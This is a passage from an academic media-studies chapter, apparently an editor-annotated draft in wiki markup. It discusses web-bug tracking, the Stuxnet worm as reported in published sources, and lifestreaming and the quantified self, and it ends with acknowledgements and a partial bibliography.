*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just repeats the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. [Eds: Do you need to give an indication as to what some of these questions might be?] The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
